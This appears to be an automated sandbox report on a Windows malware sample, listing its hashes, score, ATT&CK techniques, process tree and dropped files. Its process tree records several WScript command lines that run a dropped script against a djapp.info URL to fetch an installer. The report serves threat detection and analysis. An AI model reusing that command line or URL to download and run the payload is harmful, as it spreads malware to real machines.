b3dc4afc3b5d4c239fc854e85da13063b45898fb7ddc1cee01cb316f4a5f9b9b

Analysis

max time kernel
128s
max time network
129s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28/09/2024, 16:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe
Size

184KB
MD5

fca7e89b4a4cf615f84895dc9b68cd73
SHA1

b62def6d271a4c136e99c147b0a86a85f6bdb464
SHA256

b3dc4afc3b5d4c239fc854e85da13063b45898fb7ddc1cee01cb316f4a5f9b9b
SHA512

600a8af1fba5bd6646776953ef01a0453ac7062085b703dc572e95993a958338f59784eae63fb6efa0686544b3395063b647f25ca85c348f150c87aa3dd74cbc
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3x:/7BSH8zUB+nGESaaRvoB7FJNndnc

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2472	WScript.exe
8	2472	WScript.exe
10	2472	WScript.exe
13	1676	WScript.exe
14	1676	WScript.exe
16	2896	WScript.exe
17	2896	WScript.exe
20	1040	WScript.exe
21	1040	WScript.exe
23	2172	WScript.exe
24	2172	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1316	2448	WerFault.exe	30

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2448 wrote to memory of 2472	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	31
PID 2448 wrote to memory of 2472	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	31
PID 2448 wrote to memory of 2472	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	31
PID 2448 wrote to memory of 2472	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	31
PID 2448 wrote to memory of 1676	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	33
PID 2448 wrote to memory of 1676	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	33
PID 2448 wrote to memory of 1676	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	33
PID 2448 wrote to memory of 1676	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	33
PID 2448 wrote to memory of 2896	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	35
PID 2448 wrote to memory of 2896	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	35
PID 2448 wrote to memory of 2896	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	35
PID 2448 wrote to memory of 2896	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	35
PID 2448 wrote to memory of 1040	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	37
PID 2448 wrote to memory of 1040	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	37
PID 2448 wrote to memory of 1040	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	37
PID 2448 wrote to memory of 1040	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	37
PID 2448 wrote to memory of 2172	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	39
PID 2448 wrote to memory of 2172	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	39
PID 2448 wrote to memory of 2172	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	39
PID 2448 wrote to memory of 2172	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	39
PID 2448 wrote to memory of 1316	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	41
PID 2448 wrote to memory of 1316	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	41
PID 2448 wrote to memory of 1316	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	41
PID 2448 wrote to memory of 1316	2448	fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe	41

C:\Users\Admin\AppData\Local\Temp\fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\fca7e89b4a4cf615f84895dc9b68cd73_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2448
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE234.js" http://www.djapp.info/?domain=pDvKkDzvFh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fufE234.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2472
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE234.js" http://www.djapp.info/?domain=pDvKkDzvFh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fufE234.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1676
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE234.js" http://www.djapp.info/?domain=pDvKkDzvFh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fufE234.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2896
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE234.js" http://www.djapp.info/?domain=pDvKkDzvFh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fufE234.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1040
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE234.js" http://www.djapp.info/?domain=pDvKkDzvFh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fufE234.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2172
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 560
  2⤵
  - Program crash
  PID:1316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
0aae759cfbca58fb3924aaa522c4777d

SHA1
0e281c600b5fa414432ede4145eebc57ff63d78e

SHA256
87fdec12b19cae16f8148ed685b3684d07f0aea3033c3b98b265aa981ac96f56

SHA512
4ad626bf47fb706980b46f6485fb503bf23991f593edf5003fed260edf537350ad24d5b1b8cec3a74c5ca9b021f675d32ebaee0d2d8dcae28e0843cc9c7f158e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
9d5c0fcbdfb41b86bfbe4816fba1f3f0

SHA1
1896fa3e4b9f5538171e4370c6a571cc9893d608

SHA256
8bfa033062e397a7c617b7603d8d35c720a70be132e0c101023cb20d394e0dab

SHA512
12dccc64d1faa5962283a69da0eb13f2b939ea570f7f04741cfc4348732590bf83ca2d86fffaf05630ad3bbb9f07210672e25aa71d85fefda19592f8de36d395

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\domain_profile[1].htm

Filesize
40KB

MD5
1acc1cca915addba9abf89f38d0612ec

SHA1
f085a41004d83a86aa63fd28e15fbf67a2c8a73f

SHA256
da9c8cd764533fee666688e93b367ab7ff31ded84996efd5b77489070ad48d86

SHA512
d407198629e93a96487d25ed21151648c1f77fe3687727b7b104bf59e0a88418a6f5865782681a5dfdc7d42910e576dbcf7a23a6863dc1705df6e0e95b2df2f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\domain_profile[1].htm

Filesize
40KB

MD5
23c36034de42c79ee5764cfca76ec832

SHA1
2c1986ae5cc39cea2f29bc0f96d184eb1cb3514f

SHA256
be65a31cfce6cbd2ebbd5d939efe0ee3e94164a5d57c63e105978b34ab29acd4

SHA512
d3b9ed444274fcf7872af00ecc221988fb479581c664382ad6bd31ba0502489174a8d36745ec132dfc54ac5440dc0cd5a116e185c40624cf07105333bc9f0f0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\domain_profile[1].htm

Filesize
6KB

MD5
1e0c06753bf03e083ff6855b6d940819

SHA1
46a1a9366c4709a1aec026f45a2a6ea9da42d56e

SHA256
98edcfb2e46b67da2860cce387f4e1c8f201912f675529dc11351a02c6875b90

SHA512
a0553654c7729ca8ae189a23fee0b21380d87410a00a9c53f60e9a93499b568cc4c12e06ff8eae6cd34d2dd5f0a02e655cf7069e7afb420fa2bfc8867245e184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\domain_profile[1].htm

Filesize
40KB

MD5
e2a0c555ae1976b3753b93a43ff401c8

SHA1
c478951ef5f32b6b66325fa5ca5429366fdaec0b

SHA256
6b071b87a50b715d131728cf26c6adb5a8e891eae9282f7821a3f4905e25df31

SHA512
9feedbf689e2d29e7a9ad19ca35564962754a3e8482660018137a8bb2893577ef4490627e248385f4b9b95033937e669e4851b57d307a4162212adf387bc73f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab428C.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5A70.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufE234.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0Y8AS0KJ.txt

Filesize
175B

MD5
8aa5173503a3b7836d45f92b848ae62c

SHA1
11c50b92ca38eb04b708fbf4b098c79d5bb734e9

SHA256
80efdbbfb6f2a981b5f2f9a274a70938c843579809ef8629817e12c2bda0858f

SHA512
adf3699b0ceabdbb69858221d8eeafdaf3f4194d7d854af8249129244e8f5b2e1a860a0ca612df82c11f36090bf4b9cbb0e1d17362524afd66e0a8a9fc3bfd7b

Download Submit